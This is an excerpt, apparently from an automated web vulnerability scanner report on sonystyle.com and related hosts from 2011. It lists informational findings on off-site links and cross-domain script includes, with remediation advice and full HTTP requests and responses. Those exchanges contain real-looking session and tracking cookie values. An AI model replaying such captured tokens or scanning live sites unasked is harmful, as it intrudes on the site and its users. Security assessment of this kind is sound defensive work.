<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://green.sel.sony.com/index.html" target="_blank" class="redArrowLink">Recycling Program</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://esupport.sony.com/" target="_blank" class="redArrowLink">Online Product Support</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://esupport.sony.com/US/perl/contact-land.pl" target="_blank" class="redArrowLink">Contact Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.9. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73360
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=gKhUalwoDI2z%2bNprXZ4zIKFzImo%3d%0a%3b2011%2d06%2d23+11%3a19%3a57%2e352%5f1308841107995%2d82466%5f10151%5f241903390%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:57 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903390=241903390%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG4oMGqREaYXQdgrhlLJv3qbvnxtslAf5G4pPtDsUOINJCueV5cMMwxhx5ni8RjGeSOa%0asInl12kMoEjmCmyUzHwfxteaIruGewQaiLBIDV0gTI%2bF6NR9bXRaayEonpmxIhImeBdp%2fZ1DQQ%3d%3d; Path=/
Set-Cookie: TS5bbf46=8cda39d87185f14d1bf971f120ead6895e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e6ced6c50a378910e; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.10. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480

Response

HTTP/1.1 200 OK
ntCoent-Length: 93671
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 93671
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:08 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.11. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78597
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:28 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.12. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gDefault_v2.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion= HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: http://www.websitealive5.com/4405/rRouter.asp?groupid=4405&websiteid=150&departmentid=5101&dl=http%3A//www.omnitechsupport.com/about.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:28 GMT
Content-Length: 15042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a href="http://www.omnitechsupport.com" target="_blank"><img src="https://images.websitealive.com/images/hosted/upload/9106.gif" style="margin-top:10px; margin-bottom:20px; margin-left:25px;border:none;"></a>
...[SNIP]...

11. Cross-domain script include  previous  next
There are 20 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


11.1. http://script.aculo.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://script.aculo.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: script.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 23 Jun 2011 15:19:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Content-Length: 13458

<!DOCTYPE html>
<html>
<head>
<title>script.aculo.us - web 2.0 javascript</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/rs
...[SNIP]...
</center>

<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...

11.2. http://twitter.com/sonyoutletusa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /sonyoutletusa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308842373-2439-32037
ETag: "face9414ffcb37b56c235fd4a36ddf88"
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 23 Jun 2011 15:19:33 GMT
X-Runtime: 0.00853
Content-Type: text/html; charset=utf-8
Content-Length: 19872
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2a867da6018348b9ab53639033d7a20fdada72a0
Set-Cookie: k=173.193.214.243.1308842373290278; path=/; expires=Thu, 30-Jun-11 15:19:33 GMT; domain=.twitter.com
Set-Cookie: guest_id=130884237329990406; path=/; expires=Sat, 23 Jul 2011 15:19:33 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
